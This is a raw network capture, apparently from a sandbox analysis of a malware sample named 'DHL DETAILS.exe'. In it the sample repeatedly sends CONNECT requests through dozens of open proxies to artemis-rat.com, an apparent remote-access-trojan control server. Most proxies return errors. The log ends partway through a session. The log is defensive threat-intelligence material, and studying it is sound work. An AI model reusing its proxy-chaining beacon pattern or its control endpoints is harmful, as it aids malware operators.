Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1139	192.168.2.5	53377	185.220.226.235	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.260584116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1140	192.168.2.5	53447	184.170.249.65	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.260741949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1141	192.168.2.5	53305	117.160.250.131	8899	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.297360897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.136230946 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1142	192.168.2.5	53404	8.222.175.210	50554	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.298748970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.102036953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1143	192.168.2.5	53383	144.24.122.46	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.310969114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.857870102 CET	536	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
Mar 9, 2024 13:14:25.858027935 CET	269	IN	Data Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1144	192.168.2.5	53437	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.326685905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1145	192.168.2.5	53446	43.131.246.77	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.381680965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1146	192.168.2.5	53445	94.45.74.60	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.382507086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1147	192.168.2.5	53396	103.86.109.38	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.382512093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.799325943 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1148	192.168.2.5	53448	94.177.106.178	2324	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.384763956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1149	192.168.2.5	53449	82.113.157.122	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.385910034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1150	192.168.2.5	53429	45.150.25.132	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.386652946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.248755932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.567810059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1151	192.168.2.5	53062	38.162.8.232	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.443603039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.883591890 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1152	192.168.2.5	53451	23.137.248.197	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.444212914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1153	192.168.2.5	53452	46.35.9.110	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.448201895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1154	192.168.2.5	53419	154.118.228.212	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.450253010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1155	192.168.2.5	53431	122.114.232.137	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.462574959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.380148888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1156	192.168.2.5	53450	43.128.146.42	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.475897074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1157	192.168.2.5	53583	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.478075027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1158	192.168.2.5	53456	51.79.87.144	41746	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.478883982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.020772934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.724118948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.039036036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1159	192.168.2.5	53588	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.480273008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1160	192.168.2.5	53595	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.482002020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1161	192.168.2.5	53600	103.133.222.170	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.483387947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1162	192.168.2.5	53493	104.16.108.149	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.484246969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.649266958 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1163	192.168.2.5	53477	138.68.60.8	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.484950066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.683079004 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1164	192.168.2.5	53490	104.238.111.107	28394	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.485989094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.973892927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.552555084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.568074942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.591275930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1165	192.168.2.5	53609	49.51.93.222	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.486707926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1166	192.168.2.5	53453	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.489634037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1167	192.168.2.5	51581	195.169.35.214	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.523550987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.536587954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1168	192.168.2.5	53261	216.176.187.99	8889	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.527332067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.734740019 CET	68	IN	HTTP/1.1 200 Connection established Set-Cookie: SRV=S10; path=/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1169	192.168.2.5	53454	34.95.243.122	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.543315887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1170	192.168.2.5	53132	47.243.114.192	8180	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.546056986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1171	192.168.2.5	53499	162.159.242.10	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.547574997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.708358049 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1172	192.168.2.5	53510	104.27.122.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
